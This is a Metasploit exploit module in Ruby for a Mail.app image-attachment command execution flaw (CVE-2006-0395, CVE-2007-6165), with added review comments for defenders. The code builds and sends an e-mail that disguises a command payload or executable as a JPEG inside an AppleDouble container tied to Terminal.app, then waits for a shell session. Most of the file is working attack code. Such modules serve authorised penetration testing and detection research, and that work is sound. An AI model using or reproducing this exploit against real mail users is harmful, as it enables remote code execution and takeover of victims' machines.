GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/osx/email/mailapp_image_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit exploit module for the Mail.app image-attachment command
# execution flaw listed under 'References' (CVE-2006-0395, CVE-2007-6165).
#
# What the code does: #exploit builds one e-mail, attaches a
# multipart/appledouble container to it and passes the result to
# send_message. The module then only reports that it is waiting for a session
# ('Stance' is Passive).
#
# Review notes for mail-gateway and endpoint defenders, all read off the
# message this file constructs:
# * The container's Content-Type is multipart/appledouble with
#   Content-Disposition: inline.
# * Its first part is application/applefile (base64). The template it is
#   built from decodes to a blob containing the path
#   "/Applications/Utilities/Terminal.app" and the resource type "usro".
# * Its second part is declared image/jpeg but carries x-unix-mode=0755,
#   x-mac-type=0 and x-mac-creator=0; its body is the base64 of a command
#   string or an executable, not image data.
# * Both parts share a file name of five random letters plus ".jpg".
# * Per the Description, the affected client is Mail.app as shipped with
#   Mac OS X 10.5.0; whether later releases are fixed is not stated here --
#   confirm against the vendor advisories for the listed CVEs.
class MetasploitModule < Msf::Exploit::Remote
  # Module rank as declared by the authors.
  Rank = ManualRanking

  #
  # This module sends email messages via smtp
  #
  include Msf::Exploit::Remote::SMTPDeliver
  # Provides generate_payload_exe, used by #exploit for the binary targets.
  include Msf::Exploit::EXE

  # Registers the module metadata (name, references, payload constraints,
  # targets) with the framework by merging it into +info+ via update_info.
  #
  # info - Hash of metadata supplied by the caller; defaults to empty.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Mail.app Image Attachment Command Execution',
        # NOTE(review): the text below says the flaw was patched "in March of
        # 2007", while 'DisclosureDate' is 2006-03-01 and the first reference
        # is CVE-2006-0395 -- confirm the year.
        'Description' => %q{
This module exploits a command execution vulnerability in the
Mail.app application shipped with Mac OS X 10.5.0. This flaw was
patched in 10.4 in March of 2007, but reintroduced into the final
release of 10.5.
},
        'License' => MSF_LICENSE,
        'Author' => ['hdm', 'kf'],
        'References' => [
          ['CVE', '2006-0395'],
          ['CVE', '2007-6165'],
          ['OSVDB', '40875'],
          ['BID', '26510'],
          ['BID', '16907']
        ],
        # Passive: #exploit sends the mail and returns; it does not connect to
        # a target host itself.
        'Stance' => Msf::Exploit::Stance::Passive,
        'Payload' => {
          'Space' => 8192,
          'DisableNops' => true,
          'BadChars' => "",
          # presumably excludes bind- and find-style payload connections --
          # confirm against the framework's Compat syntax
          'Compat' =>
          {
            'ConnectionType' => '-bind -find',
          },
        },
        'Platform' => %w{unix osx},
        # Three targets: one command-string target and two binary targets
        # (x86, ppc). #exploit branches on the selected target's arch.
        'Targets' => [
          [
            'Mail.app - Command Payloads',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'PayloadCompat' => {
                'RequiredCmd' => 'generic perl ruby bash-tcp telnet',
              }
            }
          ],
          [
            'Mail.app - Binary Payloads (x86)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
          [
            'Mail.app - Binary Payloads (ppc)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_PPC,
            }
          ],
        ],
        'DisclosureDate' => '2006-03-01',
        # All three values are the UNKNOWN_* placeholders; reliability,
        # stability and side effects are not characterised in this file.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Always returns false.
  # NOTE(review): presumably opts the module out of automated module
  # selection -- confirm against the framework's use of autofilter.
  def autofilter
    false
  end

  # Builds the message described in the class comment and sends it with
  # send_message. Reads the SUBJECT, MAILTO and MAILFROM datastore options.
  # Prints a status line once the message has been handed off.
  def exploit
    # Only one extension is offered, so the random pick always yields 'jpg'.
    exts = ['jpg']

    gext = exts[rand(exts.length)]
    # Attachment name: five random letters plus the extension (nine
    # characters, the same length as the "Heise.jpg" placeholder replaced
    # further down).
    name = rand_text_alpha(5) + ".#{gext}"
    # NOTE(review): `data` is assigned here and never read in this method.
    data = rand_text_alpha(rand(32) + 1)

    # Outer message; the subject falls back to random letters when SUBJECT
    # is unset.
    msg = Rex::MIME::Message.new
    msg.mime_defaults
    msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32) + 1)
    msg.to = datastore['MAILTO']
    msg.from = datastore['MAILFROM']

    # Inner container holding the two attachment parts.
    dbl = Rex::MIME::Message.new
    dbl.header.set("Content-Type", "multipart/appledouble;\r\n boundary=#{dbl.bound}")
    dbl.header.set("Content-Disposition", "inline")

    # AppleDouble file version 2
    # 3 entries - 'Finder Info', 'Real name', 'Resource Fork'
    # The 'Real name' entry of this template is the literal "Heise.jpg"; it
    # is swapped for the random name by the gsub below.
    # The decoded template also contains "/Applications/Utilities/Terminal.app"
    # and the resource type "usro".

    resfork =
      "AAUWBwACAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAJAAAAPgAAAAoAAAADAAAASAAAAAkAAAACAAAA\r\n" +
      "UQAABToAAAAAAAAAAAAASGVpc2UuanBnAAABAAAABQgAAAQIAAAAMgAAAAAAAAAAAAAAAAAAAAAA\r\n" +
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQA\r\n" +
      "AAAlL0FwcGxpY2F0aW9ucy9VdGlsaXRpZXMvVGVybWluYWwuYXBwAOzs7P/s7Oz/7Ozs/+zs7P/s\r\n" +
      "7Oz/7Ozs/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/5ubm/+bm5v/m5ub/5ubm/+bm\r\n" +
      "5v/m5ub/5ubm/+bm5v/p6en/6enp/+np6f/p6en/6enp/+np6f/p6en/6enp/+zs7P/s7Oz/7Ozs\r\n" +
      "/+zs7P/s7Oz/7Ozs/+zs7P/s7Oz/7+/v/+/v7//v7+//7+/v/+/v7//v7+//7+/v/+/v7//z8/P/\r\n" +
      "8/Pz//Pz8//z8/P/8/Pz//Pz8//z8/P/8/Pz//b29v/29vb/9vb2//b29v/29vb/9vb2//b29v/2\r\n" +
      "9vb/+Pj4//j4+P/4+Pj/+Pj4//j4+P/4+Pj/+Pj4//j4+P/8/Pz//Pz8//z8/P/8/Pz//Pz8//z8\r\n" +
      "/P/8/Pz//Pz8////////////////////////////////////////////////////////////////\r\n" +
      "/////////////////////6gAAACoAAAAqAAAAKgAAACoAAAAqAAAAKgAAACoAAAAKgAAACoAAAAq\r\n" +
      "AAAAKgAAACoAAAAqAAAAKgAAACoAAAADAAAAAwAAAAMAAAADAAAAAwAAAAMAAAADAAAAAwAAAAAA\r\n" +
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
      "AAAAAQAAAAUIAAAECAAAADIAX9CsEsIAAAAcADIAAHVzcm8AAAAKAAD//wAAAAABDSF8" + "\r\n"

    # Decode the template, substitute the file name, and re-encode it.
    # The "\r\n" argument is presumably the base64 line delimiter -- confirm
    # against Rex::Text.encode_base64.
    fork = Rex::Text.encode_base64(Rex::Text.decode_base64(resfork).gsub("Heise.jpg", name), "\r\n")

    # Random Content-Id value of the form <letters@letters.com>.
    cid = "<#{rand_text_alpha(rand(16) + 16)}@#{rand_text_alpha(rand(16) + 1)}.com>"

    # Placeholder; both branches below overwrite it.
    cmd = ''

    # Command target: the encoded payload string is the attachment body.
    # Binary targets: an executable from generate_payload_exe is.
    if (target.arch.include?(ARCH_CMD))
      cmd = Rex::Text.encode_base64(payload.encoded, "\r\n")
    else
      bin = generate_payload_exe
      cmd = Rex::Text.encode_base64(bin, "\r\n")
    end

    # Part 1: the AppleDouble header/resource-fork blob.
    dbl.add_part(fork, "application/applefile;\r\n name=\"#{name}\"", "base64", "inline;\r\n filename=#{name}")
    # Part 2: labelled image/jpeg, with x-unix-mode=0755 in the Content-Type
    # parameters. The third argument carries an embedded CRLF followed by
    # "Content-Id: ..."; presumably add_part emits it verbatim, so the part
    # gains a Content-Id header -- confirm against Rex::MIME::Message#add_part.
    dbl.add_part(cmd, "image/jpeg;\r\n x-mac-type=0;\r\n x-unix-mode=0755;\r\n x-mac-creator=0;\r\n name=\"#{name}\"", "base64\r\nContent-Id: #{cid}", "inline;\r\n filename=#{name}")

    msg.parts << dbl

    send_message(msg.to_s)

    print_status("Waiting for a payload session (backgrounding)...")
  end
end